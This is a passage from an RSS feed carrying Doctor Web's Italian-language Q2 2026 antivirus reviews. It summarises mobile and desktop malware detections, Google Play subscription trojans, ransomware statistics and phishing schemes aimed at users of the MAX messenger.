    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di mod malevole dell'applicazione di messaggistica WhatsApp, che impercettibilmente per l'utente possono caricare vari siti in modalità background.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue, e in alcuni casi, vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza nel sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan bancario che intercetta gli SMS con codici monouso da istituti di credito, il contenuto di notifiche, nonché raccoglie altre informazioni confidenziali. Queste ultime includono dati tecnici sul dispositivo infetto, la lista di applicazioni installate, informazioni sulla scheda SIM, su chiamate ed SMS ricevuti e inviati.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito, hanno una lista di sistemi di pagamento e banche più popolari, attraverso cui presumibilmente sarebbe possibile ritirare i premi. Ma anche quando gli utenti riescono ad accumulare la somma da ritirare sufficiente, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi Android in cui tramite strumenti hacker per il modding di applicazioni è aggiunto codice spazzatura. Tale modificazione viene eseguita allo scopo di confondere la logica dei programmi. Questa tecnica è spesso riscontrata nei trojan bancari e nelle versioni pirata di software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. Questa utility contiene moduli per l'offuscamento e la protezione del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. L'offuscamento da essa aggiunto spesso viene utilizzato in malware per renderne più difficile il rilevamento e l'analisi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi di ottimizzazione che creano periodicamente notifiche con messaggi fuorvianti su presunti memoria insufficiente ed errori di sistema allo scopo di visualizzare annunci pubblicitari durante "l'ottimizzazione".&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applicazioni spacciate per strumenti di cheat per l'ottenimento di risorse in giochi. In realtà, sono creati per la visualizzazione di pubblicità. Questi programmi ricevono dal server remoto la configurazione, in base alla quale caricano un sito target con annunci: banner, finestre a comparsa, filmati ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo pubblicitario che può essere integrato in programmi Android. Visualizza notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questo modulo raccoglie una serie di dati riservati, ed è in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo pubblicitario che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app, e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

&lt;p&gt;Durante il II trimestre 2026, gli analisti dei virus dell'azienda Doctor Web hanno rilevato sullo store di app Google Play diversi nuovi programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, che iscrivono gli utenti a servizi a pagamento. Venivano distribuiti sotto la falsa apparenza di svariati software: un servizio di streaming ShowLounge - TV &amp; Dramas (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.25&lt;/b&gt;), un programma per giocatori AIM: Crosshair Asist (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.26&lt;/b&gt;), un gioco True Cargo Drive (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.27&lt;/b&gt;), un'utility Battery 3D: Charge Effects (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.28&lt;/b&gt;) e un editor di immagini PixStudio - Photo Editor (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.29&lt;/b&gt;). Il numero complessivo di download è stato almeno 2.600.000.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di programmi trojan &lt;b&gt;Android.Subscription&lt;/b&gt;, rilevati su Google Play in II trimestre 2026&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Le applicazioni malevole di questo tipo caricano siti web dove tramite la tecnologia Wap Click gli utenti vengono iscritti ad abbonamenti mobili a pagamento. Alle potenziali vittime viene chiesto il loro numero di cellulare, e dopo il suo inserimento, viene eseguito un tentativo di attivazione dei servizi corrispondenti.&lt;/p&gt;

&lt;p&gt;Su Google Play di nuovo venivano distribuiti i programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, i quali anche abbonano le loro vittime a servizi a pagamento. I malintenzionati li spacciavano per app di messaggistica: Chat Messages (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2625&lt;/b&gt;) e Easy Messages (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2632&lt;/b&gt;), nonché per utility di ottimizzazione del sistema: Smart File Cleaner, Junk Clean Master e Fast Cleaner (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2614&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2618&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2626&lt;/b&gt; rispettivamente).&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Una delle app malevole in cui erano nascosti i trojan della famiglia &lt;b&gt;Android.Joker&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Per la protezione dei dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15275&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in II trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15275&amp;lng=it&amp;c=5</link><pubDate>Wed, 01 Jul 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 luglio 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel II trimestre 2026 il numero totale di minacce rilevate è aumentato del 5,72% rispetto al I trimestre. Il numero di minacce uniche è cresciuto del 95,32%. Venivano prevalentemente rilevati sui dispositivi protetti le applicazioni pubblicitarie e i trojan pubblicitari, i programmi malevoli cryptominer e i trojan che vengono utilizzati per l'avvio di altre minacce. &lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Nel traffico email venivano rilevati con maggiore frequenza gli script malevoli e le varie applicazioni trojan, tra cui downloader, dropper, password stealer e cryptominer. Erano diffusi anche i backdoor, i documenti di phishing e i vari exploit.&lt;/p&gt;

&lt;p&gt;Gli utenti i cui file sono stati colpiti dai trojan ransomware di criptazione nella maggior parte dei casi riscontravano &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; e &lt;b&gt;Trojan.Encoder.37400&lt;/b&gt;. Allo stesso tempo, il numero di richieste di decriptazione pervenute al Servizio di supporto tecnico Doctor Web è diminuito leggermente rispetto al trimestre precedente.&lt;/p&gt;

&lt;p&gt;Nel II trimestre 2026 gli analisti internet dell'azienda Doctor Web osservavano una crescita del numero di attacchi di phishing agli utenti del programma di messaggistica MAX. Inoltre, i malintenzionati sfruttavano le tematiche delle notizie attuali e adattavano di conseguenza i popolari schemi fraudolenti.&lt;/p&gt;

&lt;p&gt;Ad aprile è emerso che uno degli aggiornamenti di Microsoft Visual Studio Code &lt;a href="https://news.drweb-av.it/show/?i=15146" target="_blank"&gt;conteneva codice malevolo&lt;/a&gt;. Era uno script trojan facente parte della libreria pubblica JavaScript es5-ext, la quale era stata inclusa nel software aggiornato. Questo script viene avviato a condizione di corrispondenza del fuso orario di alcune città russe e visualizza un appello con una posizione anti-russa nella console dello sviluppatore.&lt;/p&gt;

&lt;p&gt;A maggio &lt;a href="https://news.drweb-av.it/show/?i=15253" target="_blank"&gt;abbiamo avvertito&lt;/a&gt; della diffusione del programma malevolo JobStealer, mirato agli utenti di Mac e Windows. I cybercriminali lo spacciavano per software per colloqui di lavoro online. Il trojan JobStealer ruba varie informazioni riservate, tra cui i dati da circa 300 estensioni di browser di portafogli di criptovalute, i file del programma di messaggistica Telegram, le password e i dati di carte bancarie salvati nei browser, nonché i file cookie.&lt;/p&gt;

&lt;p&gt;A giugno gli specialisti del laboratorio antivirus dell'azienda Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15262" target="_blank"&gt;hanno segnalato&lt;/a&gt; un nuovo trojan pubblicitario &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, che è capace di visualizzare annunci in modalità background grazie alla possibilità di aggirare le restrizioni del sistema operativo Android. A questo scopo, il trojan sfrutta applicazioni di terze parti selezionando la tecnica adatta a seconda del produttore del dispositivo target.&lt;/p&gt;

&lt;p&gt;Tra le applicazioni malevole per dispostivi Android, sono rimasti leader per il numero di rilevamenti sui dispositivi protetti i trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Allo stesso tempo, gli attori di minacce hanno continuato a utilizzare attivamente i vari strumenti per il modding di programmi Android per proteggere i software malevoli dal rilevamento tramite antivirus. Inoltre, durante il II trimestre i nostri analisti dei virus hanno rilevato sullo store di app Google Play una serie di nuovi programmi trojan creati per iscrivere utenti a servizi mobili a pagamento.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di II trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Aumenta il numero di minacce rilevate sui dispositivi protetti.&lt;/li&gt;
        &lt;li&gt;Tra le minacce rilevate, aumenta significativamente il numero di file unici.&lt;/li&gt;
        &lt;li&gt;Il numero di richieste di decriptazione dei file colpiti dai trojan ransomware di criptazione diminuisce rispetto al I trimestre.&lt;/li&gt;
        &lt;li&gt;I truffatori iniziano ad attaccare più spesso gli utenti del servizio di messaggistica russo MAX.&lt;/li&gt;
        &lt;li&gt;I trojan bancari &lt;b&gt;Android.Banker&lt;/b&gt; rimangono i programmi malevoli per dispositivi Android più diffusi.&lt;/li&gt;
        &lt;li&gt;Gli specialisti Doctor Web rilevano un trojan pubblicitario, &lt;b&gt;Android.MagicAd.1&lt;/b&gt;, che è capace di aggirare le restrizioni di SO Android e visualizzare annunci dalla modalità background.&lt;/li&gt;
        &lt;li&gt;Gli attori di minacce distribuiscono il programma malevolo JobStealer, progettato per rubare dati riservati agli utenti dei computer Mac e Windows.&lt;/li&gt;
        &lt;li&gt;In uno degli aggiornamenti di Microsoft Visual Studio Code è rilevato codice malevolo.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse di II trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Adware.Downware.20091&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Software pubblicitario utilizzato come installer intermedio di programmi pirata.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Starter.8319&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di script XML malevoli che avviano il trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; e i suoi componenti.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiche delle applicazioni malevole nel traffico email&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse nel traffico email di II trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;X97M.DownLoader.2343&lt;/dt&gt;
    &lt;dd&gt;File XLSX (formato di fogli di calcolo Microsoft Excel) con un oggetto OLE che scarica un file malevolo sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consentono di eseguire codice arbitrario.&lt;/dd&gt;
    &lt;dt&gt;JS.Muldrop.1171&lt;/dt&gt;
    &lt;dd&gt;Script malevolo in formato JavaScript, che avvia il malware in esso nascosto nel sistema target.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

&lt;p&gt;Rispetto al I trimestre 2026, nel II trimestre il numero di richieste di decriptazione dei file colpiti dai trojan ransomware di criptazione è leggermente diminuito — del 2,67%.&lt;/p&gt;

&lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al Servizio di supporto tecnico Doctor Web:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Ransomware di criptazione più diffusi di II trimestre 2026&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 14,47% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 5,26% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.37400&lt;/b&gt; — 3,95% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3,29% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44197&lt;/b&gt; — 2,63% di richieste utente&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Frode online&lt;/h3&gt;

&lt;p&gt;Una delle tendenze osservate dagli analisti internet di Doctor Web nel II trimestre 2026 è stata la cresciuta attività degli attacchi dei malintenzionati agli utenti del servizio di messaggistica istantanea russo MAX a fronte della crescita del suo pubblico. I malintenzionati utilizzano schemi noti che in precedenza erano orientati agli utenti di altri servizi di messaggistica istantanea, come Telegram e WhatsApp. Ad esempio, i nostri specialisti hanno rilevato numerosi siti fraudolenti creati allo scopo di rubare account MAX utilizzando il pretesto di svariate votazioni. La potenziale vittima viene invitata a votare in un determinato concorso, ma per fare questo, deve entrare nel proprio account fornendo il numero di cellulare e il codice di verifica arrivato dopo il suo inserimento. Quando l'utente inserisce tutti i dati, gli attaccanti ottengono l'accesso al suo account.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di uno dei siti di phishing tramite il quale i truffatori ottengono l'accesso all'account dell'app di messaggistica MAX della vittima&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante il II trimestre, gli analisti internet di Doctor Web segnalavano la comparsa di ulteriori siti fraudolenti relativi a investimenti. I cybercriminali seguono le moderne tendenze e continuano a sfruttare attivamente la tematica dell'intelligenza artificiale. Ad esempio, su alcune risorse internet loro invitavano le potenziali vittime ad aderire a un nuovo progetto di investimento, presumibilmente legato a maggiori istituti di credito russi. I malintenzionati promettevano l'accesso a un chatbot specializzato basato sull'AI ChatGPT, che fornirebbe l'assistenza negli investimenti. Per diventare partecipanti al "progetto", i visitatori del sito dovevano registrarsi indicando le proprie informazioni personali.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito fraudolento che suggerisce di registrarsi in un progetto di investimento, presumibilmente legato a una banca russa, e ottenere l'accesso a un chatbot finanziario specializzato basato su AI ChatGPT&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Allo stesso tempo, i truffatori cercavano di attirare gli utenti di lingua russa non solo con i nomi delle banche russe, ma anche con quelli di istituti creditizi di altri paesi. Ad esempio, i cybercriminali presentavano una serie di siti web di pseudo investimento come servizi legati a banche sudcoreane.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti fraudolenti che invitava gli utenti di lingua russa ad aderire a un certo progetto di investimento di una delle banche sudcoreane e prometteva un reddito a partire da 2.000.000 won sudcoreani&lt;/em&gt;&lt;/p&gt;

